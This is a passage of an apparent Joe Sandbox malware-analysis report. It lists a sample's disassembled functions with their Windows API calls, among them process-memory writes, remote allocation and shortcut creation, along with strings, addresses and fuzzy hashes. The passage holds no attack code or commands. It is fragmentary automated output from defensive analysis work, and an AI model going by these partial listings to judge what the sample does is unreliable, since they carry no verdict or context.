                                                                                        • Opcode Fuzzy Hash: 277d2a7aee9fe4252afb6c4bd4a74fcf03e524be5daa791f547215c0750856e2
                                                                                        • Instruction Fuzzy Hash: 3D018130E00709ABEB245B10DE4EBD67BB8FB10705F040559F997A24E0DBF0AA84EBC0
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00EFB0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,00F5E680,00000000,?,?,?), ref: 00EFB0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00EFB0E9
                                                                                        • DeleteObject.GDI32 ref: 00EFB0FC
                                                                                        • StrokePath.GDI32(?), ref: 00EFB117
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: 0409ede4f98915bbad57e8dfbfc99cbd806ec8fc25eddfc8262436d882cb5268
                                                                                        • Instruction ID: 95c10d46c65c611f0b7b5538a49e51cda4c4c3e30677356003544246e9617082
                                                                                        • Opcode Fuzzy Hash: 0409ede4f98915bbad57e8dfbfc99cbd806ec8fc25eddfc8262436d882cb5268
                                                                                        • Instruction Fuzzy Hash: 3BF03CB410060CEFDB219F65EC0C7A53F64BB123A6F088314F525941F0CB708966EF10
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F2F2DA
                                                                                        • CoCreateInstance.OLE32(00F6DA7C,00000000,00000001,00F6D8EC,?), ref: 00F2F2F2
                                                                                        • CoUninitialize.OLE32 ref: 00F2F555
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        • Opcode ID: 723af6f1ed1a48226fb95618088cb14accf019d446bd4741cb3b79dc0c8854d9
                                                                                        • Instruction ID: 2053281eafc8a05b63c28a4b9cc47484cc2d06d9e2a88613772e3a0b54959882
                                                                                        • Opcode Fuzzy Hash: 723af6f1ed1a48226fb95618088cb14accf019d446bd4741cb3b79dc0c8854d9
                                                                                        • Instruction Fuzzy Hash: AFA12C71504245AFD300EF64CC81DAFB7E8EF98714F40491DF655A7192EB70EA4ACBA2
                                                                                        APIs
                                                                                          • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 00F2E85D
                                                                                        • CoCreateInstance.OLE32(00F6DA7C,00000000,00000001,00F6D8EC,?), ref: 00F2E876
                                                                                        • CoUninitialize.OLE32 ref: 00F2E893
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 7f7980e9f5334cb4d2bfcd30acb9df8dc1fe77c52f8a775f8a64012e7f1689ce
                                                                                        • Instruction ID: a716fe28c05ccb7937bf3a865fd5f1151247f6d765057066127897f57d6a0fa2
                                                                                        • Opcode Fuzzy Hash: 7f7980e9f5334cb4d2bfcd30acb9df8dc1fe77c52f8a775f8a64012e7f1689ce
                                                                                        • Instruction Fuzzy Hash: 45A14735A043159FCB10DF15C484D6ABBE5FF89320F148949F996AB3A2CB31EC45DB91
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F032ED
                                                                                          • Part of subcall function 00F0E0D0: __87except.LIBCMT ref: 00F0E10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        • Opcode ID: ea9ba0144a192e12e2882029ec6cacbd81941c8bbe0b2f158b5e9dfee2d5c3d3
                                                                                        • Instruction ID: a6e137d71abef84d402757c0fba0f89bfbff9c52fde81f24c4e5624715575fea
                                                                                        • Opcode Fuzzy Hash: ea9ba0144a192e12e2882029ec6cacbd81941c8bbe0b2f158b5e9dfee2d5c3d3
                                                                                        • Instruction Fuzzy Hash: 24514872E0820596DB15BB14CD8137A3BACDB41730F348D69F4D5822E9DF398ED8BA46
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F7DC50,?,0000000F,0000000C,00000016,00F7DC50,?), ref: 00F24645
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00F246C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        • Opcode ID: d11126bedfffc7776e6ec6c1fe52a39ed437b8d41cca796d7d198f84e936fef0
                                                                                        • Instruction ID: 4ff292e18862f562e268502b02adfef5cc2de44906183097c884439044171930
                                                                                        • Opcode Fuzzy Hash: d11126bedfffc7776e6ec6c1fe52a39ed437b8d41cca796d7d198f84e936fef0
                                                                                        • Instruction Fuzzy Hash: BA41E531A0026D9FCF00DF95D881AAEB7F4FF45314F148069E926AB292D7B4EC41DB40
                                                                                        APIs
                                                                                          • Part of subcall function 00F2430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F1BC08,?,?,00000034,00000800,?,00000034), ref: 00F24335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00F1C1D3
                                                                                          • Part of subcall function 00F242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00F1BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00F24300
                                                                                          • Part of subcall function 00F2422F: GetWindowThreadProcessId.USER32(?,?), ref: 00F2425A
                                                                                          • Part of subcall function 00F2422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00F1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F2426A
                                                                                          • Part of subcall function 00F2422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F1BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00F24280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F1C240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F1C28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: bf812c5b7ad1e497af0037ed8ecfc1b0729ced55101e12941208e825332be98c
                                                                                        • Instruction ID: 2624efe4e7f6bb66ca5f47ea67b4a4f4b1015dd73f5e479fe1b677a0fdd9676c
                                                                                        • Opcode Fuzzy Hash: bf812c5b7ad1e497af0037ed8ecfc1b0729ced55101e12941208e825332be98c
                                                                                        • Instruction Fuzzy Hash: 72414E72D0021CAFDB10DFA4DC81AEEB7B8AF09710F004095FA55B7181DB756E85DBA1
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F7DC00,00000000,?,?,?,?), ref: 00F4A6D8
                                                                                        • GetWindowLongW.USER32 ref: 00F4A6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F4A705
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: b4f5cf4c1856080acdc7410dd35b6f4b7b581dfc397b0ecba3db2fe39c243261
                                                                                        • Instruction ID: b5218b252531a249b1b8fcb3040022fbcbb75f3dd038bbe757dda4043311cf07
                                                                                        • Opcode Fuzzy Hash: b4f5cf4c1856080acdc7410dd35b6f4b7b581dfc397b0ecba3db2fe39c243261
                                                                                        • Instruction Fuzzy Hash: EB31AE31A41209ABDB218E38CC41BEA7BA9FB49334F254715F975A32E0D770A851AB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00F4A15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00F4A172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F4A196
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: f5d41a13be112e81dcb21b5570fc88b156f9a272d26a40e8dae3b01bbd36f300
                                                                                        • Instruction ID: e8d7613362c6193a83e50efe45f72b015d1b68e98f9c1ef6d1482b99c9f5e5d3
                                                                                        • Opcode Fuzzy Hash: f5d41a13be112e81dcb21b5570fc88b156f9a272d26a40e8dae3b01bbd36f300
                                                                                        • Instruction Fuzzy Hash: 7F21A132950218ABEF118F94CC42FEA3B79FF88764F110214FE55AB1D0D6B5AC51EB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F4A941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F4A94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F4A956
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: f7088100926e1fcdf3d63663fde2ead12f7546eb00ad2cabd58995dd1e41a7d4
                                                                                        • Instruction ID: 29627aeae3646f860d331f001338928a29aaa2191447129e0bac5777ce6221ad
                                                                                        • Opcode Fuzzy Hash: f7088100926e1fcdf3d63663fde2ead12f7546eb00ad2cabd58995dd1e41a7d4
                                                                                        • Instruction Fuzzy Hash: D82160B5A40209AFEB10DF18CC91D773BADEB5A3A4B050059FA149B3A1CB71EC11EB61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F49A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F49A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F49A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: 6e95cb4ed0317a8862f11ed7e8c2ef96c1a32703a894f554bf3da5c45bcc70a5
                                                                                        • Instruction ID: 787094a7fb7b40a700bd681d8b9cfd9db6cd907cc8bdc504fdf0703137ebfd7b
                                                                                        • Opcode Fuzzy Hash: 6e95cb4ed0317a8862f11ed7e8c2ef96c1a32703a894f554bf3da5c45bcc70a5
                                                                                        • Instruction Fuzzy Hash: B4219572B14118BFDF118F54CC85FBF3BAAEF89760F018129F95497190C6B59C51A7A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F4A46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F4A482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F4A48F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 4406196e2ba8fb6e8bf29d17b44ab432de9651becca2a66d66051d3c947bbe25
                                                                                        • Instruction ID: 7be7a166079c1811f9370f313e959bee9b044e0bfb80108a7b2b9f4d67185f8a
                                                                                        • Opcode Fuzzy Hash: 4406196e2ba8fb6e8bf29d17b44ab432de9651becca2a66d66051d3c947bbe25
                                                                                        • Instruction Fuzzy Hash: D011E771640208BEEF209F65CC49FAB3B69FF89764F114118FA45A60B1D2B2E811E720
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00F02350,?), ref: 00F022A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F022A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: e2f676fdb8ba14dc8925f64aa869b66788fff12931f59c6c7b97241b77634a69
                                                                                        • Instruction ID: 30984731337b63d29e8bfa8e1a682ed02edbca0449369215f27d1b3b0ea732fc
                                                                                        • Opcode Fuzzy Hash: e2f676fdb8ba14dc8925f64aa869b66788fff12931f59c6c7b97241b77634a69
                                                                                        • Instruction Fuzzy Hash: EFE01AB4E94308ABEB905FB1EC4DB543664A702716F104020F102D60F0CFF88051FF16
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F02276), ref: 00F02376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00F0237D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: e3f4f2b6bf6b3c2e5af353f08f6cc78911a117713c36476c730178705e6c8564
                                                                                        • Instruction ID: d9bcc668c9d969d15bede011247a0cd8f0c2c38e725ef71b56b28a425f51248d
                                                                                        • Opcode Fuzzy Hash: e3f4f2b6bf6b3c2e5af353f08f6cc78911a117713c36476c730178705e6c8564
                                                                                        • Instruction Fuzzy Hash: EFE0BDF0B88308ABEB606F61FD0DB543A64B706706F100424F10AE20B4CBBA9420FA25
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: 791c848b229a875e2a49bf32cbf055bb0cc9a2fba3bc4d82c6143bc733b19b6f
                                                                                        • Instruction ID: eab82de737f1062a61942d5794f8f6daaa636032eabfcade1b240d1cda7d0c64
                                                                                        • Opcode Fuzzy Hash: 791c848b229a875e2a49bf32cbf055bb0cc9a2fba3bc4d82c6143bc733b19b6f
                                                                                        • Instruction Fuzzy Hash: 0FE0127280461CDBCB109790CD09EF9737CA704742F5001D2FE16A1000D675DBA8BB23
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00EE42EC,?,00EE42AA,?), ref: 00EE4304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EE4316
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: e296453b5278ec1c6562dc44ba4e6e315dd014bcd7ccd758a20a26f11386c23d
                                                                                        • Instruction ID: c8a28a02232dba4e54c5c42bac6f1152b96886afd385b02f72992348611f0794
                                                                                        • Opcode Fuzzy Hash: e296453b5278ec1c6562dc44ba4e6e315dd014bcd7ccd758a20a26f11386c23d
                                                                                        • Instruction Fuzzy Hash: 95D0A7B4900716EFFB205F22E80C60176D4AB05309B004419E451E22A4D7F0C8809610
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00F421FB,?,00F423EF), ref: 00F42213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F42225
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                        • API String ID: 2574300362-399901964
                                                                                        • Opcode ID: 66a56647a4461f1a8cfeac8cdb40febd44ae8014784834e3f5c34d05609b1e1d
                                                                                        • Instruction ID: 828f71b9b64ca0552ba8e9e85a6384a5b8170dc6573b877bdd739f6d6543c74c
                                                                                        • Opcode Fuzzy Hash: 66a56647a4461f1a8cfeac8cdb40febd44ae8014784834e3f5c34d05609b1e1d
                                                                                        • Instruction Fuzzy Hash: B4D0A734D007169FFBB15F71F8086017BD4EB0A314B004429FC51E2150D7F4D880FA60
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00EE41BB,00EE4341,?,00EE422F,?,00EE41BB,?,?,?,?,00EE39FE,?,00000001), ref: 00EE4359
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EE436B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
